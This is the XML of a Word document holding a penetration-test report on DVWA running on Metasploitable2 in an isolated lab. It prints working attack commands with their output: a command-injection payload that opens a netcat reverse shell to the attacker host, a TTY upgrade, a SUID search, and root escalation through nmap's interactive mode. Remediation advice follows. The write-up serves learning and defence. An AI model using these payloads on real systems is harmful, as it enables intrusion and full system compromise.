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0"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application Exploitation &amp; Privilege Escalation Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolated Lab Environment — DVWA on Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared as a self-directed learning / portfolio project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Date: July 29, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report documents a two-stage penetration test conducted against a vulnerable web application (Damn Vulnerable Web Application, DVWA) hosted on the Metasploitable2 training image, from an isolated Kali Linux attacker workstation. Unlike a single-step exploit, this assessment demonstrates a realistic attack chain: gaining an initial low-privileged foothold through a web application vulnerability, then escalating that foothold to full root-level control of the underlying operating system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An OS command injection vulnerability in DVWA's "Command Injection" module was identified and exploited to obtain a low-privilege reverse shell as the web server user, www-data. Post-exploitation enumeration then identified a misconfigured SUID binary (nmap) that was leveraged to escalate privileges to root, resulting in full system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rPr>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Metasploitable2 / DVWA (192.168.56.30)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Kali Linux (192.168.56.10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Isolated VirtualBox Internal Network ("intnet")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assessment Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Authenticated web application test + local privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Overall Risk Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope and Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This assessment was conducted entirely within a self-contained virtual lab. Both the attacker and target machines were placed on a VirtualBox Internal Network with no bridge or route to any production network, host machine, or the internet, ensuring no third-party systems could be affected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 In-Scope Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target VM: Metasploitable2 (192.168.56.30) — DVWA web application, security level set to "Low"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attacker VM: Kali Linux (192.168.56.10) — testing platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify vulnerabilities in the target's web application layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit a web vulnerability to obtain code execution / a shell on the underlying host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerate the compromised host for privilege escalation opportunities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Escalate to root and confirm full system compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document findings and provide remediation guidance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testing followed a standard four-phase approach: web reconnaissance, vulnerability identification and exploitation, initial-access shell acquisition, and post-exploitation privilege escalation. All activity was performed manually from the Kali Linux attacker VM using Nikto, a web browser, and native Linux command-line tooling (netcat, python).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Web Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A web vulnerability scan was run against the target's HTTP service to identify outdated software and misconfigurations:</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 nikto -h http://192.168.56.30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scan identified an outdated Apache 2.2.8 server and PHP 5.2.4 installation, an exposed phpMyAdmin instance, a publicly accessible phpinfo.php file, and directory indexing enabled on multiple paths. Manual browsing of the target's web root also revealed a landing page linking to several intentionally vulnerable applications, including DVWA (Damn Vulnerable Web Application), Mutillidae, TWiki, and WebDAV.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Target Application Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DVWA was accessed and authenticated using its documented default credentials (admin / password). The application's internal "security level" setting was set to Low, which disables input sanitization to allow safe practice of common vulnerability classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Finding: OS Command Injection in DVWA "Command Injection"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rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS (approx.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">DVWA Command Injection page (ping utility)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">OS Command Injection (CWE-78)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application's "ping" feature accepts a user-supplied IP address and passes it directly into a system shell command without sanitization or validation. This allows an attacker to append additional shell commands using standard command-chaining syntax, resulting in arbitrary command execution on the underlying host with the privileges of the web server process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerability was first confirmed by submitting the following input, which returned both the expected ping output and the result of an injected whoami command:</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192.168.56.30 &amp;&amp; whoami</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The response confirmed command execution was occurring as the low-privileged web server account, www-data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Exploitation: Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To move beyond one-off command execution, a reverse shell was established. A listener was started on the attacker host:</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 nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following payload was then submitted through the vulnerable input field, instructing the target to connect back to the attacker on port 4444 and hand over a bash shell:</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192.168.56.30 &amp;&amp; nc 192.168.56.10 4444 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The listener received an incoming connection from the target, confirming successful exploitation:</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listening on [any] 4444 ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">connect to [192.168.56.10] from (UNKNOWN) [192.168.56.30] 47169</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A Python one-liner was used to upgrade the raw shell to a fully interactive TTY session, allowing reliable use of interactive tools during subsequent enumeration:</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python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Finding: Privilege Escalation via Misconfigured SUID Binary (nmap)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rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">/usr/bin/nmap (SUID root bit set)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Insecure Permissions / Local Privilege Escalation (CWE-269)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Kernel Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Linux 2.6.24-16-server (2008)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Following initial access, the compromised host was enumerated for local privilege escalation opportunities. A search for SUID binaries (files that execute with the permissions of their owner, regardless of who runs them) was performed:</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find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Among the results, /usr/bin/nmap was found with the SUID bit set and owned by root. Older versions of Nmap include an interactive mode that can spawn an operating system shell, and because the binary itself runs with root privileges, any shell it spawns inherits that same root privilege — a configuration Nmap's own documentation explicitly warns against.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This was exploited as follows:</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nmap --interactive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">nmap&gt; !sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The resulting shell was confirmed to be running with root privileges:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="F0F0F0" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The euid=0(root) value confirms the process was granted an effective root identity, giving full read/write/execute control over the entire filesystem and operating system, despite the real user ID remaining www-data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Risk and Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This finding represents a complete, two-stage compromise of the target host starting from a public-facing web application vulnerability. An attacker requires no valid credentials for the underlying operating system at any stage — only the ability to reach the vulnerable web endpoint. Once initial access is achieved, the misconfigured SUID nmap binary provides an immediate, reliable path to full root access with no advanced exploit development required. In a production environment, this chain would result in total loss of confidentiality, integrity, and availability of the host, and could be used as a pivot point to attack other systems on the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanitize and validate all user input before it is passed to any system shell command; use parameterized APIs or allow-lists instead of string concatenation for the ping functionality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avoid constructing shell commands from user input entirely where possible; use language-native networking libraries instead of shelling out to system utilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove the SUID bit from /usr/bin/nmap and any other binary that does not explicitly require it — Nmap's own documentation recommends against SUID installation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regularly audit the filesystem for unexpected SUID/SGID binaries using automated tooling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Patch or upgrade the underlying operating system; the 2008-era 2.6.24 kernel in use carries numerous unpatched, publicly known local privilege escalation vulnerabilities beyond the one demonstrated here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply the principle of least privilege to the web server process (www-data) and monitor for anomalous process execution such as reverse shells or interactive tool invocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This exercise demonstrated a complete, realistic two-stage attack chain: exploitation of a web application command injection vulnerability to obtain an initial low-privileged foothold, followed by local enumeration and exploitation of a misconfigured SUID binary to escalate to full root access. This mirrors the structure of real-world engagements far more closely than a single-step exploit, and highlights how a chain of individually moderate issues (unsanitized input, a permissive file permission) can combine into a critical, full-compromise outcome. All testing was conducted safely against an intentionally vulnerable training image with no exposure to production systems or third parties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="88888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2026-07-29T07:18:22.023Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-29T07:18:22.039Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>